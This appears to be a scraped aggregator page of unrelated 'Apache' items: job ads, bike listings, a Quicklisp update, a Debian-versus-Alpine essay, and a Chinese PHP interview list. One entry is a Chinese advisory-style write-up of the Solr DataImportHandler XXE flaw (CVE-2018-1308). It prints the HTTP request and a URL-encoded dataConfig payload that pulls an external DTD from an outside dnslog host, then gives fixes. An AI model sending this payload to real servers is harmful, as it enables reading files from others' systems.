  • 常见 API 的APP_IDAPP_SECRET主要作用是什么?阐述下流程
  • API 请求如何保证数据不被篡改?
  • JSON 和 JSONP 的区别
  • 数据加密和验签的区别
  • RSA 是什么
  • API 版本兼容怎么处理
  • 限流(木桶、令牌桶)
  • OAuth 2 主要用在哪些场景下
  • JWT
  • PHP 中json_encode(['key'=>123]);与return json_encode([]);区别,会产生什么问题?如何解决

加分项

  • 了解常用语言特性,及不同场景适用性。
    • PHP VS Golang
    • PHP VS Python
    • PHP VS JAVA
  • 了解 PHP 扩展开发
  • 熟练掌握 C

声明

该资料不针对任何一家公司,对因该资料对您产生的影响概不负责,望知晓。

祝顺利


          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          15R AH-64 Attack Helicoptor Repairer      Cache   Translate Page   Web Page Cache   
MO-WHITEMAN AFB, 15R AH-64 Attack Helicoptor Repairer Job Description If you're looking to take your mechanical skills to the next level, then join the Army National Guard and watch your future take flight as an AH-64 (Apache) Attack Helicopter Repairer. In this position, you will learn how to repair and maintain the mighty Apache Attack Helicopter. Specific duties may include: removing, servicing, and installing
          Need to implement learning to rank algorithm in apache solr      Cache   Translate Page   Web Page Cache   
I have a dataset of a series of designations and I am looking to sort them on the basis of heiristics (eg. Manager> associate> analyst and director>manager>associate manager, etc.) I require someone experienced... (Budget: ₹75000 - ₹150000 INR, Jobs: Apache Solr, Elasticsearch, Lucene, Machine Learning, Software Architecture)
          security/vuxml - 1.1_3      Cache   Translate Page   Web Page Cache   
security/vuxml: add CVE for Apache CouchDB 1.7.2 (databases/couchdb) Approved by: jrm Differential Revision: https://reviews.freebsd.org/D16212
          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Fiscalía de Puebla y la SGG niega haber girado las órdenes de aprehensión contra militantes de Morena      Cache   Translate Page   Web Page Cache   

La Fiscalía General del Estado de Puebla (FGE) descartó que existan órdenes de aprehensión por los hechos ocurridos la semana pasada en el Grand Hotel MM, donde senadores, diputados y alcaldes electos de Morena habrían descubierto una mapachera del Partido Acción Nacional (PAN) a favor de Martha Érika Alonso Hidalgo, hoy gobernadora electa del estado....

La entrada Fiscalía de Puebla y la SGG niega haber girado las órdenes de aprehensión contra militantes de Morena aparece primero en La Jornada de Oriente.


          Best modern technologies to use to build a database-driven site?      Cache   Translate Page   Web Page Cache   

for my own training purposes I may be best sticking with PHP or .Net?

I never said this. I would personally never advocate PHP, because of multiple reasons I'm not going to get into here. But, mostly because I see no value in it. When PHP became popular, it was the best solution on the block, today it doesn't really excel at any area that would make me give it consideration.

My suggestion has always been Node.js, because you will be using JS on the frontend anyway and it's less to learn. Writing an api endpoint that connects to a DB is stupid simple. It's also very easy to get up and running and deployed. Much easier than any kind of Apache or nginx configurations you'd need to make for PHP.

.Net is a good choice, but configuring a deployment server is going to be difficult or expensive, depending on if you choose .Net Core (difficult) or Windows Server (expensive).


          Comment on Hero Xtreme 200R First Ride Review: Xtreme Upgrade by Spec Comparo: Bajaj NS 200 v Hero Xtreme 200R v TVS Apache RTR200 4V - Best Bikes in India | No.1 Two Wheeler Magazine | Bike India      Cache   Translate Page   Web Page Cache   
[…] Earlier this month, we had a chance to ride the new Xtreme 200R at the Buddh International Circuit. Check out a brief first ride impression, here. […]
          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Middleware Engineer-II (Middleware Senior) - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer-II (Middleware Senior) Job Requirements: Required Skills: 3 – 5 years of Apache administration experience 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Thu, 17 May 2018 04:46:56 GMT - View all McLean, VA jobs
          Middleware Engineers - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer Professional Required Technical Skills Bachelor’s Degree · 3 – 5 years of Apache administration experience · 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Mon, 14 May 2018 10:39:11 GMT - View all McLean, VA jobs
          Solr DIH dataConfig参数XXE漏洞      Cache   Translate Page   Web Page Cache   

别人的CVE,编号CVE-2018-1308。今天无意看到了,刚好有用Solr搭建过服务,所以来水一篇。

0x01 背景介绍

DataImportHandler主要用于从数据库抓取数据并创建索引,Solr搭建完毕,并将数据插入到MySQL等数据库之后,需要创建Core,并且对数据库中的数据生成索引,在生成索引的时候就会用到DIH。

在使用solr web控制台生成core索引的时候,dataConfig参数存在xxe漏洞,攻击者可以向服务端提交恶意的xml数据,利用恶意xml数据可以读取被攻击服务器的敏感文件、目录等。

漏洞影响版本:

Solr 1.2 to 6.6.2

Solr 7.0.0 to 7.2.1

漏洞原文链接:

https://issues.apache.org/jira/browse/SOLR-11971

http://seclists.org/oss-sec/2018/q2/22

0x02 漏洞测试

1、打开Solr Admin控制台;

2、选择创建好的core,然后点击DataImport功能;

3、点击”Execute“的时候,进行抓包,可以获取Dataimport的具体请求。

也可以直接访问功能入口Url:

http://www.nxadmin.com/solr/#/corename/dataimport

以solr 6.0.1为例,抓包获取的测试请求如下:

POST /corename/dataimport?_=1531279910257&indent=on&wt=json HTTP/1.1
Host: 61.133.214.178:9983
Content-Length: 282
Accept: application/json, text/plain, */*
Origin: http://www.nxadmin.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-type: application/x-www-form-urlencoded
Referer: http://www.nxadmin.com/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

command=full-import&verbose=false&clean=false&commit=false&optimize=false&core=xxetest

默认请求中是不存在漏洞参数dataConfig的,使用的是配置文件的方式data-config.xml中包含了mysql数据库的连接配置,以及需要生成索引的表的字段等信息。有关请求中非默认参数的相关代码片段:

package org.apache.solr.handler.dataimport;
......
public class RequestInfo {
  private final String command;
  private final boolean debug;  
  private final boolean syncMode;
  private final boolean commit; 
  private final boolean optimize;
  ......
  private final String configFile;
  private final String dataConfig;

  public RequestInfo(SolrQueryRequest request, Map<String,Object> requestParams, ContentStream stream) {
  
  ......
  
    String dataConfigParam = (String) requestParams.get("dataConfig");
    if (dataConfigParam != null && dataConfigParam.trim().length() == 0) {
      //如果dataConfig参数的值为空,将该参数置为null
      dataConfigParam = null;
    }
    dataConfig = dataConfigParam;
    
 ......
 
   public String getDataConfig() {
    return dataConfig;
  }
  
 ......
 
}

使用如上请求,可以自行添加dataConfig参数,因此具体的漏洞测试请求如下;

POST /corename/dataimport?_=1531279910257&indent=on&wt=json HTTP/1.1
Host: 61.133.214.178:9983
Content-Length: 282
Accept: application/json, text/plain, */*
Origin: http://www.nxadmin.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-type: application/x-www-form-urlencoded
Referer: http://www.nxadmin.com/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

command=full-import&verbose=false&clean=false&commit=false&optimize=false&core=xxetest&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E %3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2Fsolrxxe.8ug564.ceye.io%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E

以上是漏洞作者提供的测试payload,使用dnslog的方式证明漏洞存在,如图:

image

0x03 修复建议&缓解措施

1、升级到6.6.3或7.3版本;

2、或者将solr Admin控制台放到内网;

3、以6.0.1为例,可以为控制台增加401认证方式,6.0.1默认是没有授权认证的,匿名用户可直接访问管理控制台,需要单独配置增加401认证。在配置的时候需要注意,涉及到的主要功能请求URL都需要进行401认证,否则有可能会被攻击者直接访问功能请求来绕过401认证。


          Quicklisp news: July 2018 Quicklisp dist update now available      Cache   Translate Page   Web Page Cache   
Hi everyone! There's a new Quicklisp update for July, and regular updates should resume on a monthly schedule.

I'm using a new release system that involves Docker for easier build server setup and management. It took a while to get going but it should (eventually) make it easier for others to run things in an environment similar to mine. For example, it has all the required foreign libraries needed to compile and load everything in Quicklisp.

Here's the info for the new update:

New projects:
  • april — April is a subset of the APL programming language that compiles to Common Lisp. — Apache-2.0
  • aws-foundation — Amazon AWS low-level utilities — BSD
  • binary-io — Library for reading and writing binary data. — BSD
  • cl-bip39 — A Common Lisp implementation of BIP-0039 — MIT
  • cl-bnf — A simple BNF parser. — MIT
  • cl-generator — cl-generator, a generator implementation for common lisp — MIT
  • cl-patterns — Pattern library for algorithmic music composition and performance in Common Lisp. — GNU General Public License v3.0
  • cl-progress-bar — Display progress bars directly in REPL. — MIT
  • clad — The CLAD System. — BSD
  • concrete-syntax-tree — Library for parsing Common Lisp code into a concrete syntax tree. — FreeBSD
  • definitions — General definitions reflection library. — Artistic
  • eclector — A Common Lisp reader that can adapt to different implementations, and that can return Concrete Syntax Trees — BSD
  • flute — A beautiful, easilly composable HTML5 generation library — MIT
  • froute — An Http routing class that takes advantage of the MOP — MIT
  • language-codes — A small library mapping language codes to language names. — Artistic
  • lichat-ldap — LDAP backend for the Lichat server profiles. — Artistic
  • multilang-documentation — A drop-in replacement for CL:DOCUMENTATION providing multi-language docstrings — Artistic
  • multiposter — A small application to post to multiple services at once. — Artistic
  • sandalphon.lambda-list — Lambda list parsing and usage — WTFPL
  • sel — Programmatic modification and evaluation of software — GPL 3
  • system-locale — System locale and language discovery — Artistic
  • taglib — Pure Lisp implementation to read (and write, perhaps, one day) tags — UNLICENSE 
  • terrable — Terragen TER file format reader — Artistic
  • tooter — A client library for Mastodon instances. — Artistic
  • trace-db — Writing, reading, storing, and searching of program traces — GPL 3
  • umbra — A library of reusable GPU shader functions. — MIT
Updated projects3d-matrices3d-vectorsagnostic-lizardalexaaws-sign4base-blobsbodge-blobs-supportbodge-chipmunkbodge-nanovgbodge-nuklearbordeaux-threadsbt-semaphorecavemanceplcepl.drm-gbmcerberuschirpcl-algebraic-data-typecl-asynccl-autorepocl-cognitocl-conllucl-darkskycl-flowcl-formscl-gamepadcl-geoscl-gobject-introspectioncl-gophercl-hamcrestcl-interpolcl-liballegrocl-libsvm-formatcl-mechanizecl-mpicl-muthcl-online-learningcl-pslibcl-pythoncl-random-forestcl-readlinecl-rediscl-rulescl-sdl2cl-strcl-tomlcl-yesqlclackclawclipcloser-mopclosure-htmlclssclxcodexcoleslawcommon-lisp-actorsconfiguration.optionscroatoancurry-compose-reader-macrosdelta-debugdeploydexadordjuladmldocumentation-utilsdocumentation-utils-extensionsdoubly-linked-listdufydynamic-mixinselffare-scriptsfemlispfftflareflexi-streamsforfreebsd-sysctlfxmlgamebox-frame-managergamebox-mathglsl-specglsl-toolkitglyphsgolden-utilsgraphgsllharmonyhelambdaphunchensocketironcladjoselichat-protocollichat-serverliblichat-tcp-serverlisp-chatlistopiamaidenmcclimmedia-typesmitoninevehomer-countopticloverlordoxenfurtparachuteparseqparser.inipathname-utilspgloaderphysical-quantitiesplumppostmodernppathpythonic-string-readerqbase64qlotqt-libsqtoolsrandom-samplerovertg-maths-dot2serapeumshadowsimple-flow-dispatcherslimespinneretstaplestring-casestumpwmsxqlthe-cost-of-nothingtriviatrivial-ldaptrivial-mmapubiquitousuiopunit-formulavarjowebsocket-driverwhofieldsxhtmlambdaxlsxxml-emitter.

Removed projects: binge, black-tie, cl-ctrnn, cl-directed-graph, cl-ledger, cl-scan, readable, spartns.

The projects removed either didn't build (cl-directed-graph) or are no longer available for download that I could find (everything else).

To get this update, use (ql:update-dist "quicklisp").

Enjoy!


          LXer: How to set up Apache Virtual Hosts on Debian 9      Cache   Translate Page   Web Page Cache   
Published at LXer: In this tutorial, we will show you how to set up Apache virtual hosts on Debian 9. Apache is a free and open source web server. It is the most popular and widely used web server...
           2013 TVS Apache RTR 40000 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 27,500, Model: Apache RTR, Year: 2013 , KM Driven: 40,000 km,
Urgent sale interested call me 70929862.12 no chat don't waste my time https://www.olx.in/item/2013-tvs-apache-rtr-40000-kms-ID1lNcRh.html
           2011 TVS Apache RTR 80000 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 20,000, Model: Star City Plus, Year: 2011 , KM Driven: 80,000 km,
bike is very condicen https://www.olx.in/item/2011-tvs-apache-rtr-80000-kms-ID1lN5g5.html
          Linux System Administrator - Earth Resources Technology, Inc - Seattle, WA      Cache   Translate Page   Web Page Cache   
Apache webserver, Tomcat, BIND, Nagios and Nagvis, Snort, Gitlab, openDCIM, R-cran, ColdFusion, and Commonspot....
From Earth Resources Technology, Inc - Tue, 13 Mar 2018 19:23:29 GMT - View all Seattle, WA jobs
          Web Based Software Developer - 4D Tech Solutions, Inc. - Morgantown, WV      Cache   Translate Page   Web Page Cache   
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). 4D Tech Solutions is currently looking for a mid-level Software/Web Developer (4+ years...
From Indeed - Wed, 27 Jun 2018 12:34:02 GMT - View all Morgantown, WV jobs
          Jr. Software Engineer - Leidos - Morgantown, WV      Cache   Translate Page   Web Page Cache   
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). Put your Java/C++ skills in action!...
From Leidos - Sat, 07 Jul 2018 12:34:13 GMT - View all Morgantown, WV jobs
          Software Developer - Leidos - Morgantown, WV      Cache   Translate Page   Web Page Cache   
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). The Leidos Health Products &amp; Service Group has an opening for a Software Developers with...
From Leidos - Fri, 01 Jun 2018 10:39:46 GMT - View all Morgantown, WV jobs
          GeekList Item: Item for Geeklist "Trimming The Fat 2018 - a US only Math Trade"       Cache   Translate Page   Web Page Cache   

by dmb229

An item Board Game: Thunderbolt Apache Leader has been added to the geeklist Trimming The Fat 2018 - a US only Math Trade
          nginx conf to write for streaming      Cache   Translate Page   Web Page Cache   
I have to send in db all the video recordings for each user (from nginx conf). if you know how to do and you can do work from teamviewer or chrome remote please write in your description: "I can do remote"..... (Budget: €30 - €250 EUR, Jobs: Apache, Linux, Nginx, PHP, Ubuntu)
          Building Mobile Apps With Capacitor And Vue.js      Cache   Translate Page   Web Page Cache   
Recently, the Ionic team announced an open-source spiritual successor to Apache Cordova and Adobe PhoneGap, called Capacitor. Capacitor allows you to build an application with modern web technologies and run it everywhere, from web browsers to native mobile devices (Android and iOS) and even desktop platforms via Electron — the popular GitHub platform for building cross-platform desktop apps with Node.js and front-end web technologies. Ionic — the most popular hybrid mobile framework — currently runs on top of Cordova, but in future versions, Capacitor will be the default option for Ionic apps.
          nginx conf to write for streaming      Cache   Translate Page   Web Page Cache   
I have to send in db all the video recordings for each user (from nginx conf). if you know how to do and you can do work from teamviewer or chrome remote please write in your description: "I can do remote"..... (Budget: €30 - €250 EUR, Jobs: Apache, Linux, Nginx, PHP, Ubuntu)
          nginx conf to write for streaming      Cache   Translate Page   Web Page Cache   
I have to send in db all the video recordings for each user (from nginx conf). if you know how to do and you can do work from teamviewer or chrome remote please write in your description: "I can do remote"..... (Budget: €30 - €250 EUR, Jobs: Apache, Linux, Nginx, PHP, Ubuntu)
          Comparing Debian vs Alpine for container & Docker apps      Cache   Translate Page   Web Page Cache   

Background: For TurnKey 15 (codenamed TKLX) we're evaluating a change of architecture from the current generation of monolithic systems to systems as collections of container based micro-services. Essentially the service container replaces the package as the highest level system abstraction.

There are several layers to the new architecture, but the first step is to figure out the best way to create the service containers. Alon has been quietly working on this for the last couple of months and managed to slim down Debian to 12MB compressed for the base image:

https://github.com/tklx/base

https://hub.docker.com/r/tklx/base/

With Anton's help we added PoC tklx containers for Mongodb, Nginx, Postgres, Apache, Django and others:

https://github.com/tklx

https://hub.docker.com/u/tklx/

So far the most thought provoking question we've received is: why are we using Debian for this instead of Alpine Linux, the trendy minimalist upstart blessed by the powers at Docker?

That is a very good question, and it deserves a good answer.

Alpine Linux has its roots in LEAF, an embedded router project, which was in turn forked from the Linux Router on a Floppy project.

As far as I can tell Alpine would have stayed on the lonely far fringe of Linux distributions if not for Docker. I suspect a big part of Dockers motivation for adopting Alpine was the petabytes of bandwidth they could save if people using Docker didn't default to using a fat Ubuntu base image.

Debian is superior compared to Alpine Linux with regards to:

  • quantity and quality of supported software
  • the size and maturity of its development community
  • amount of testing everything gets
  • quality and quantity of documentation
  • present and future security of its build infrastructure
  • the size and maturity of its user community, number of people who know its ins and outs
  • compatibility with existing software (libc vs musl)

Alpine Linux's advantages on the other hand:

  • it has a smaller filesystem footprint than stock Debian.
  • its slightly more memory efficient thanks to BusyBox and musl library

Alpine touts security as an advantage but aside from defaulting to a grsecurity kernel (which isn't advantage for containers) they don't really offer anything special. If anything the small size and relative immaturity of the Alpine dev community makes it much more likely that their infrastructure and build systems are compromised. Debian is also at risk but there are more eyes on the prize, and they're working to mitigate this with reproducible/deterministic builds, which isn't on Alpine's roadmap and may be beyond their resources.

Though Alpine advertises a range of benefits the thing its dev community seems to obsess about the most is size. As small as possible.

Regarding the footprint, Alon showed you can slim down Debian so the footprint advantage is small. If that isn't enough we can take it one step further and use Debian Embedded to slim things down further by using BusyBox, and smaller libc versions, just like Alpine.

Choosing Alpine over Debian for this use case trades off people-oriented advantages that increase with value over time (skilled dev labour, bug hunters, mindshare, network effects) for machine-oriented advantages (storage and memory) that devalue rapidly thanks to Moore's Law.

I can see Alpine's advantages actually mattering in the embedded space circa 2000, but these days Debian runs fine on the $5 Raspberry Pi Zero computer, while the use case Alpine is actually being promoted for are servers with huge amounts of disk space and memory by comparison.

Maybe I'm missing something but doesn't that seem awfully short sighted?

OTOH, I can see how from Docker's POV, assuming bandwidth isn't getting as cheap as fast as storage or memory, and they're subsidizing petabytes of it, swinging from the fattest image to the slimmest image could help cut down costs. I bet Docker also like that they can have much more influence over Alpine after hiring its founder than they could ever hope to have over a big established distribution like Debian.

Summary of Debian pros:

  • vastly larger dev & user community   
    • more packages   
    • more testing   
    • more derived distributions   
    • more likely to still be in robust health in 10 years
  • working towards reproducible builds
  • better documentation
  • libc more compatible than musl, less likely to trigger bugs
  • more trustworth infrastructure

Summary of Alpine pros:

  • lighter: community obsessed with footprint
  • musl: more efficient libc alternative
  • simpler init system: OpenRC instead of systemd
  • lead dev & founder is a Docker employee
  • trendy

          #canon6d - modagrafias      Cache   Translate Page   Web Page Cache   
Se me ha quedado libre mañana por la mañana... Si alguien quiere hacerse una sesion de fotos en Santander o alrededores solo tiene que decirlo... #modelo #modeloftheday #modeling #model #modafemenina #moda #fashion #belleza #beauty #sesiondefotos #chemapacheco  #sesion #session #photosession #mujer #woman #canonphotography_official #canonphotography #canon #canon6d #glamour #fotografía #fotodeldia #foto #photography #photooftheday #photo #photograph #cantabria
           Apache CouchDB 2.1.2       Cache   Translate Page   Web Page Cache   
A database that uses JSON for documents, JavaScript for MapReduce queries and regular HTTP for an API [...]

          Telecommute Data Engineer      Cache   Translate Page   Web Page Cache   
An information technology company is in need of a Telecommute Data Engineer. Core Responsibilities Include: Using Spark to analyze terabytes of event and entity data Tracking and using dimension history in the company's analytics pipelines Handling, sorting, and rolling up the events from mobile, web, and backend systems Required Skills: Consistently shipped high quality code to production as part of a team Strong foundation in computer science, especially in the storage and retrieval of large data sets You can work with large, complex data schemas Strong knowledge of SQL, and are familiar with data warehousing technologies Proficient in writing, deploying, and debugging data pipelines using Apache Spark Have significant experience with two or more programming languages
          Administrateur système senior - NOVIPRO - Montréal, QC      Cache   Translate Page   Web Page Cache   
Connaissance de Windows serveur 2003/2008/2012/2012 r2 standards et entreprise; Connaissance des Serveurs web IIS 6.0 ou 7.0 ou 8.0 ou Apache;...
From NOVIPRO - Sat, 07 Jul 2018 00:52:11 GMT - View all Montréal, QC jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Manager – Big Data, AWS Elastic MapReduce (EMR) - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Amazon EMR is a web service which enables customers to run massive clusters with distributed big data frameworks like Apache Hadoop, Hive, Tez, Flink, Spark,...
From Amazon.com - Mon, 02 Jul 2018 08:17:21 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 20 Jun 2018 01:20:13 GMT - View all Seattle, WA jobs
          Software Development Engineer - Amazon Web Services - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Experience with Big Data technology like Apache Hadoop, NoSQL, Presto, etc. Amazon Web Services is seeking an outstanding Software Development Engineer to join...
From Amazon.com - Mon, 18 Jun 2018 19:27:06 GMT - View all Seattle, WA jobs
          Senior Mobile QA Engineer - Hallmark - Santa Monica, CA      Cache   Translate Page   Web Page Cache   
Familiarity with performance tuning applications with tools like JMeter or Apache Bench is a plus. Believe quality not only involves the end user functionality...
From Hallmark - Wed, 11 Jul 2018 20:16:04 GMT - View all Santa Monica, CA jobs


Next Page: 10000

Site Map 2018_01_14
Site Map 2018_01_15
Site Map 2018_01_16
Site Map 2018_01_17
Site Map 2018_01_18
Site Map 2018_01_19
Site Map 2018_01_20
Site Map 2018_01_21
Site Map 2018_01_22
Site Map 2018_01_23
Site Map 2018_01_24
Site Map 2018_01_25
Site Map 2018_01_26
Site Map 2018_01_27
Site Map 2018_01_28
Site Map 2018_01_29
Site Map 2018_01_30
Site Map 2018_01_31
Site Map 2018_02_01
Site Map 2018_02_02
Site Map 2018_02_03
Site Map 2018_02_04
Site Map 2018_02_05
Site Map 2018_02_06
Site Map 2018_02_07
Site Map 2018_02_08
Site Map 2018_02_09
Site Map 2018_02_10
Site Map 2018_02_11
Site Map 2018_02_12
Site Map 2018_02_13
Site Map 2018_02_14
Site Map 2018_02_15
Site Map 2018_02_15
Site Map 2018_02_16
Site Map 2018_02_17
Site Map 2018_02_18
Site Map 2018_02_19
Site Map 2018_02_20
Site Map 2018_02_21
Site Map 2018_02_22
Site Map 2018_02_23
Site Map 2018_02_24
Site Map 2018_02_25
Site Map 2018_02_26
Site Map 2018_02_27
Site Map 2018_02_28
Site Map 2018_03_01
Site Map 2018_03_02
Site Map 2018_03_03
Site Map 2018_03_04
Site Map 2018_03_05
Site Map 2018_03_06
Site Map 2018_03_07
Site Map 2018_03_08
Site Map 2018_03_09
Site Map 2018_03_10
Site Map 2018_03_11
Site Map 2018_03_12
Site Map 2018_03_13
Site Map 2018_03_14
Site Map 2018_03_15
Site Map 2018_03_16
Site Map 2018_03_17
Site Map 2018_03_18
Site Map 2018_03_19
Site Map 2018_03_20
Site Map 2018_03_21
Site Map 2018_03_22
Site Map 2018_03_23
Site Map 2018_03_24
Site Map 2018_03_25
Site Map 2018_03_26
Site Map 2018_03_27
Site Map 2018_03_28
Site Map 2018_03_29
Site Map 2018_03_30
Site Map 2018_03_31
Site Map 2018_04_01
Site Map 2018_04_02
Site Map 2018_04_03
Site Map 2018_04_04
Site Map 2018_04_05
Site Map 2018_04_06
Site Map 2018_04_07
Site Map 2018_04_08
Site Map 2018_04_09
Site Map 2018_04_10
Site Map 2018_04_11
Site Map 2018_04_12
Site Map 2018_04_13
Site Map 2018_04_14
Site Map 2018_04_15
Site Map 2018_04_16
Site Map 2018_04_17
Site Map 2018_04_18
Site Map 2018_04_19
Site Map 2018_04_20
Site Map 2018_04_21
Site Map 2018_04_22
Site Map 2018_04_23
Site Map 2018_04_24
Site Map 2018_04_25
Site Map 2018_04_26
Site Map 2018_04_27
Site Map 2018_04_28
Site Map 2018_04_29
Site Map 2018_04_30
Site Map 2018_05_01
Site Map 2018_05_02
Site Map 2018_05_03
Site Map 2018_05_04
Site Map 2018_05_05
Site Map 2018_05_06
Site Map 2018_05_07
Site Map 2018_05_08
Site Map 2018_05_09
Site Map 2018_05_15
Site Map 2018_05_16
Site Map 2018_05_17
Site Map 2018_05_18
Site Map 2018_05_19
Site Map 2018_05_20
Site Map 2018_05_21
Site Map 2018_05_22
Site Map 2018_05_23
Site Map 2018_05_24
Site Map 2018_05_25
Site Map 2018_05_26
Site Map 2018_05_27
Site Map 2018_05_28
Site Map 2018_05_29
Site Map 2018_05_30
Site Map 2018_05_31
Site Map 2018_06_01
Site Map 2018_06_02
Site Map 2018_06_03
Site Map 2018_06_04
Site Map 2018_06_05
Site Map 2018_06_06
Site Map 2018_06_07
Site Map 2018_06_08
Site Map 2018_06_09
Site Map 2018_06_10
Site Map 2018_06_11
Site Map 2018_06_12
Site Map 2018_06_13
Site Map 2018_06_14
Site Map 2018_06_15
Site Map 2018_06_16
Site Map 2018_06_17
Site Map 2018_06_18
Site Map 2018_06_19
Site Map 2018_06_20
Site Map 2018_06_21
Site Map 2018_06_22
Site Map 2018_06_23
Site Map 2018_06_24
Site Map 2018_06_25
Site Map 2018_06_26
Site Map 2018_06_27
Site Map 2018_06_28
Site Map 2018_06_29
Site Map 2018_06_30
Site Map 2018_07_01
Site Map 2018_07_02
Site Map 2018_07_03
Site Map 2018_07_04
Site Map 2018_07_05
Site Map 2018_07_06
Site Map 2018_07_07
Site Map 2018_07_08
Site Map 2018_07_09
Site Map 2018_07_10
Site Map 2018_07_11